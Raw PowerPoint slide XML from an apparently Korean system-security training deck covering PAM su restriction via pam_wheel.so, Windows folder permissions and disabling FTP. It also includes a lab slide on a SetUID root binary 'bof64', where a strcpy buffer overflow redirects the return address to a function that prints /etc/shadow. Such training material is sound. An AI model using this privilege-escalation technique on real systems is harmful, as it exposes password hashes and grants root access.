              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>so use_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>#(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주석</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거</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7450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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 로그를 확인하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환되지 않음을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC385B03-C822-4C67-BC17-8209D9217797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1687" t="13865" r="713" b="3014"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="884701"/>
            <a:ext cx="4898572" cy="2439989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF4C8086-E19B-462A-9CA8-459B472F8D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2504809960"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="547578" y="3655169"/>
          <a:ext cx="4932807" cy="492506"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3572634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20292981"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2346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파일의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>마지막 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>개의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5252999"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{147FCA47-A7D7-4F4B-8038-69A7D2A9139E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2906829667"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="550068" y="4174175"/>
          <a:ext cx="4932807" cy="492506"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="140904347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uid=0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38276291"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2346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계정은 관리자 권한을 가진다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167500"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0045126F-08FC-4771-9D61-6F890248916B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="555" b="49604"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391729" y="720992"/>
            <a:ext cx="4760686" cy="1360902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A28C8146-D035-4A9C-813B-6469F9779530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391729" y="2370412"/>
            <a:ext cx="4780407" cy="1117092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="표 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC56F90-7683-44C6-8F22-DF14E7DE3B15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2026925839"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6392300" y="3599625"/>
          <a:ext cx="4932807" cy="1224026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="344534541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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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sz="1000" b="1"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138353260"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="844296">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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레드햇</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기반 리눅스에서 많은 프로그램이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PAM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"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중앙 인증 메커니즘을 사용하도록 구성된다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PAM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플러그 가능한</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(pluggable)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모듈러</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(modular)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아키텍처를 사용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관리자가 시스템에 대한 인증 정책을 설정할 때 유연성</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(flexibility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제공한다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201622"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="표 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D254592-FBE8-4AAF-A7D8-B4F597D4E1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3922383120"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="547578" y="5376141"/>
          <a:ext cx="4932807" cy="980186"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="24322357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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>_wheel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.so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46236320"/>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모듈은 휠 그룹</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group)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시행하는 데 사용된다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휠 그룹에 포함된 계정에 대한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허용한다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이름의 그룹이 없으면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대상으로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5870174"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A175EE9C-5C2D-492B-B0BC-C2F0D9F2A36A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5242769"/>
            <a:ext cx="5616792" cy="124623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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101278909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/Training/Unit/Sys/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 6.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내부 디렉토리를 특정한 사용자가 파일에 접근할 수 있도록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설정해 주는 것이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c\navy06 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>폴더에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Everyone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설정되어 있지 않습니다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Everyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의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모든 권한으로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부여하시오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권한을 설정할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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1999049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302095626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/Training/Unit/Sys/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>서비스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서비스는 계정과 패스워드가 암호화 되지 않은 채로 전송되므로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간단한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>sniffer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의해서도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스니핑이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가능합니다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따라서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제한하는 것이 중요합니다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현재 구동 중에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중지시키시고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시작유형을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사용안함</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설정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할수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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30488822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117507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함수가 실행되도록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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304740253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dirty="0"/>
              <a:t>파일의 속성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SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소유자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 알 수 있음 ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>권한으로 실행 가능</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vim bof64.c</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foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(BOF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>취약점을 가진 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 사용됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 내용을 출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함을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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 힌트 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./bof64 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: 0x0000000000400635 ⇒ BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약점 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>복귀 주소를 조작하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 실행 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{727D84AA-90AB-4EB7-B278-E4DDF745966B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521955" y="1398059"/>
            <a:ext cx="4034790" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
